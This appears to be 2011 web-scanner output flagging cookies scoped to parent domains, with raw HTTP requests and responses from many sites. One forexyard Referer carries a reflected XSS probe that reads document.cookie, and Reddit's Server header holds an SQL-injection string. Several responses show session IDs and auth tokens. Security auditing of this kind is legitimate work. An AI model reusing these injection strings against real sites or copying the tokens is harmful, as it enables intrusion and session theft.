The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=j_Hmr; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pointeresortsaz HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=j_Hmr; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:01:55 GMT Content-Length: 168888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=QfoGh; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/ HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/search.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=QfoGh; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:48 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /uschi.eller HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=F6k4f; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fuschi.eller; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fuschi.eller; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 06 Feb 2011 16:07:09 GMT Content-Length: 22622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=juuUg; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vibrantmedia HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=juuUg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:38:48 GMT Content-Length: 157952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/quotes-chart.cssbdb85 HTTP/1.1 Host: www.forexyard.com Proxy-Connection: keep-alive Referer: http://quotes.forexyard.com/iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.cssbdb85%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec67b70ca19&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx HTTP/1.1 Host: www.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6164122648378833163"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:ZTkdLLKZK_ggZRbY44T2FKTN6Eo_M0OV49kqXrkZrEol8AbriE_Vxr:1296946948:e68b5644f2e89cdd8b8600193a537cd5b3bca0ac"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:27 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Set-Cookie: bcookie="v=1&141e3dd9-2a20-4c3c-827f-21d17cd03532"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:28 GMT Content-Length: 19987
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groupInvitation HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:USPcjVjh_OtiRy9WPlG0jPNXb0WyphkShZD0e7Nn60hypyfO-0CmKk:1296943603:1f5c383a1a62947997acc0a50d1873ded2a84670"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 22:36:42 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:3497768082988792158"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: bcookie="v=1&cd6dbf47-e6cf-4898-9bbd-b3e4bc5d6192"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 22:06:42 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965b45525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 22:36:58 GMT;path=/;httponly Content-Length: 12878
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296946953&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.livejournal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/ HTTP/1.1 Host: www.mybloglog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:07:04 GMT Set-Cookie: BX=fbnhh856krig8&b=3&s=mv; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" location: http://www.mybloglog.com/ Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 82
<!-- www2.mbl.re1.yahoo.com uncompressed/chunked Sat Feb 5 14:07:04 PST 2011 -->
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:53 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3a4937fb2983dadb56c5168b22255db3; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Set-Cookie: sprout=2_kGyhIl1F2ko87PYZ8d2fSYCKMKWCW5ewEBC8jEGtgcoaSGuXhq3hDkYeuKPwF%2FPFLYfYM9dQFw8AnXFXY4EQuxw%2FFQlGg8nSpMit7LSHzn3oOd7FRtEzmZhdhLzAs2S%2BOnUx9lwkG9YsIYSnzy21lut2nQgXaMSF%2BhOET5670ZWIbdSoPfX6svvgI4xRaVIegWb1xIBchOg2Ju8qox1cAhxIoFowYrBNSo9rB2hnM2QjP0Lo4xTAq%2Fg77FsEXPRS; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=3a4937fb2983dadb56c5168b22255db3; expires=Fri, 31-Jan-2031 23:02:53 GMT; path=/; domain=.newsvine.com Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 55069
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:18 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=ekde4uf6o3m1pae1sfc1dc4f16; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="de"> <head> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:33:54 GMT Server: Apache/2.2 X-Powered-By: PHP/5.2.17 Set-Cookie: XTCsid=3ugqie5obq0npitc2bvsin2tr7; path=/; domain=.nmworkwear.de Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="de"> <head> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:39:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/ Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:40:01 GMT Content-Length: 6309 Connection: close Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/ Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.plurk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>302 Found</title> <h1>Found</h1> <p>You should be redirected automatically to target URL:</p><p><a href="/t/English">/t/English</a>. If n ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
reddit_first=%7B%22organic_pos%22%3A%201%2C%20%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.reddit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Set-Cookie: reddit_first=%7B%22organic_pos%22%3A%201%2C%20%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/ Server: '; DROP TABLE servertypes; -- Date: Sun, 06 Feb 2011 16:11:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support/HP-W8000-Desktops-manual/id/3823ag123/t/2 HTTP/1.1 Host: www.retrevo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Set-Cookie: JSESSIONID=7C9CF70A5240CFB9892A007BA287025C; Path=/ Set-Cookie: s_refType=; Domain=.retrevo.com; Expires=Sat, 05-Feb-2011 22:09:28 GMT; Path=/ Set-Cookie: u=4d9f3b67934f473891bc273394b24dad; Domain=.retrevo.com; Expires=Mon, 28-Jan-2041 22:09:27 GMT; Path=/ Set-Cookie: us=4d9f3b67934f473891bc273394b24dad; Path=/ Set-Cookie: ss=65665; Path=/ P3P: policyref="/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT" Location: /support/HP-W8000-Desktops-manual/id/3823ag123/t/2/ Content-Length: 0 Date: Sat, 05 Feb 2011 22:09:27 GMT Server: Apache-Coyote/1.1 Connection: close
XARAYASID=ms69fapvgb6kjldegl9ntpo0g1; expires=Wed, 06 Feb 2036 03:49:00 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.terra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:16:03 GMT Server: Apache X-Powered-By: PHP/5.2.10 Status: 404 Not Found Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: WEBTRENDS_ID=173.193.214.243-1297008963.348471; path=/; expires=Fri, 01-Jan-2016 00:02:42 GMT; domain=.terra.com Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tracking/mpr.php?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:40:51 GMT Server: Apache/2.2.8 (Linux/SUSE) X-Powered-By: PHP/5.2.6 Set-Cookie: iCmprnokia1=ID%3D129701405100000%3ATBL%3D11%3ACTR%3D3%3Ac8b5e4d57e6424ab9206a1a155f3db4e%3AKD%3Dnokia%3Acid%3Dzx%3Akw%3DbannerID%3ATTnw%3DZanox%3ATTprm%3D13849089C1902184109S14786739T1469378460744041488; expires=Sun, 05-Feb-2012 17:40:51 GMT; path=/; domain=traffictrack.de Pragma: public Content-Length: 43 P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com
s=!1012; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
